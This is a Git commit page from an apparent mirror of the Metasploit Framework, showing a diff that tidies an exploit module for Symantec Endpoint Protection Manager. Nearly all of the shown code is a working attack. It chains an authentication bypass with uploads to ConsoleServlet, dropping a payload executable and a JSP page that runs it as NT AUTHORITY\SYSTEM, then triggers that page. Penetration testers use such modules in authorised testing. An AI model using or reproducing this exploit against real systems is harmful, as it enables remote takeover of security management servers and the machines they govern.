infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do ruby fixing and use FileDropper

bug/bundler_fix
jvazquez-r7 2015-08-14 17:00:27 -05:00
parent 74ed8cf0c9
commit 4aa3be7ba2
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 28 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
modules/exploits/windows/http/sepm_auth_bypass_rce.rb
View File

@ -8,20 +8,21 @@ require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
'Description' => %q{
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry', #metasploit module
'Markus Wulftange' #discovery
'Markus Wulftange', #discovery
'bperry' # metasploit module
],
'References' =>
[
@ -36,12 +37,14 @@ class Metasploit4 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {
[ 'Automatic',
{
'Arch' => ARCH_X86,
'Payload' => {
'DisableNops' => true
}
} ],
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Jul 31 2015',
@ -58,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
meterp = Rex::Text.rand_text_alpha(10)
jsp = Rex::Text.rand_text_alpha(10)
print_status("Getting cookie")
print_status("#{peer} - Getting cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
@ -70,21 +73,21 @@ class Metasploit4 < Msf::Exploit::Remote
}
})
unless res
fail_with(Failure::Unknown, 'The server did not respond in an expected way')
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
end
cookie = res.get_cookies
if cookie == nil || cookie == ''
fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
if cookie.nil? || cookie.empty?
fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
end
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}
print_status('Uploading payload...')
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
@ -100,10 +103,12 @@ class Metasploit4 < Msf::Exploit::Remote
})
unless res && res.code == 200
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
print_status("Uploading JSP page to execute the payload...")
register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
print_status("#{peer} - Uploading JSP page to execute the payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
@ -119,12 +124,14 @@ class Metasploit4 < Msf::Exploit::Remote
})
unless res && res.code == 200
fail_with(Failure::Unknown, 'Server did not respond in an expected way.')
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
print_status('Executing payload. Manual cleanup will be required.')
register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
print_status("#{peer} - Executing payload. Manual cleanup will be required.")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
})
}, 5)
end
end